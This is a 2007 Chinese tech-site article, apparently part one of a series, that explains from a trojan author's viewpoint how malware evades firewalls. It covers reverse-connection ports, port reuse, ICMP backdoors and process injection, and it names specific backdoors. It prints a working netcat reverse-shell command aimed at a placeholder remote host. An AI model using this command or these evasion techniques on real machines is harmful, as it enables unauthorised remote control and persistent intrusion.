科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道解析木马如何穿过你的防火墙?(1)

解析木马如何穿过你的防火墙?(1)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)进程插入技术诞生了,通常firewall都要允许explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序. 

作者:51CTO.COM 2007年10月22日

关键字: 木马 防火墙 Netcat ip过滤

  • 评论
  • 分享微博
  • 分享邮件

  网络不太平,谁上网都会架起个firewall来防护网络攻击,这岂不是给我们木马的生存带来了巨大挑战?

  物竞天择,适者生存,嗯...要想生存下去就要穿墙! Bypass Firewall:

  1. 首先就是No Firewall(允许本地对外监听基本上任何端口),没有防火墙?(这不是废话?)

  对付这种机器好办,随便哪个马一般都行典型代表 Radmin(其实它不是马,用的人多了,也就变成了马,无辜)

  rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?)

  2. 端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了)

  道高一尺,魔高一丈.:

  你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)

  使用工具netcat就可以穿刺这种防火墙 :

  nc -e cmd.exe 远程ip 远程监听port

  随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等

  典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac )

  还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)

  典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制)

  更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信,你防火墙能把我怎么样?哈哈

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章